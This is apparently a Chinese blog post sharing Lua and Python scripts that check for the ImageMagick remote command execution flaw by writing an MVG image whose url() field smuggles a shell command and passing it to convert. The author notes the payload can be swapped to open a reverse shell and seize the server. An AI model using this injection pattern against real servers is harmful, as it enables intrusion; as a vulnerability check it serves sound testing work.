ImageMagick远程命令执行工具检测工具
2024-10-12 09:33:57
ImageMagick这个漏洞昨天晚上就出来了,今天才有时间研究一下,今天自己也测试了一下
效果图:
=======================
用lua写了一个检测脚本
print ("Checking...")
file=io.open("exp.jpg","w")
--file:write("s")
file:write("push graphic-context\r\nviewbox 0 0 640 480\r\n")
file:write("fill 'url(https://example.com/image.jpg")
file:write('"|echo "success!!!)')
file:write("'\r\n")
file:write("pop graphic-context")
file:close()
cmd=io.popen("convert exp.jpg test.png")
result=cmd:read("*all")
print(result)
python版本:
import os
file = open("./x","w")
file.write("push graphic-context\r\n")
file.write("viewbox 0 0 640 480\r\n")
file.write("fill 'url(https://example.com/image.jpg\"|echo \"dangerous!)'\r\n")
file.write("pop graphic-context\r\n")
file.close()
res = os.system("convert ./x ./y 2>/dev/null")
if os.path.exists("x"):
os.remove("x")
if os.path.exists("y"):
os.remove("y")
如果存在返回
当然playload自己改吧,可以直接反弹个shell回来,直接拿到服务器权限
附上一篇分析文章:
http://ricterz.me/posts/Write%20Up%3A%20Remote%20Command%20Execute%20in%20Wordpress%204.5.1?_=1462399591384&from=groupmessage&isappinstalled=0
最新文章
- C#对象先序列化然后反序列化时间丢失八小时的问题
- PHP的学习--PHP的闭包
- Emacs常用命令汇总
- Swift游戏实战-跑酷熊猫 08 产生源源不断的移动平台
- Java获取音频文件(MP3)的播放时长
- hive内部表、外部表
- Android构建boot.img(一):root目录与ramdisk.img的生成
- OCI的结果输出
- Codeforces Round #306 (Div. 2)
- Git 常用配置和使用
- Linux Top使用说明
- 『转载』Debussy快速上手(Verdi相似)
- C++ Primer 学习笔记_54_类和数据抽象 --拷贝构造函数、赋值运算符
- 集群RPC通信
- 【并发编程】【JDK源码】JDK的(J.U.C)java.util.concurrent包结构
- Unity Shader笔记
- DS05--查找
- SDL_AudioSpec(转)
- p5155 [USACO18DEC]Balance Beam
- java中的接口和抽象类的区别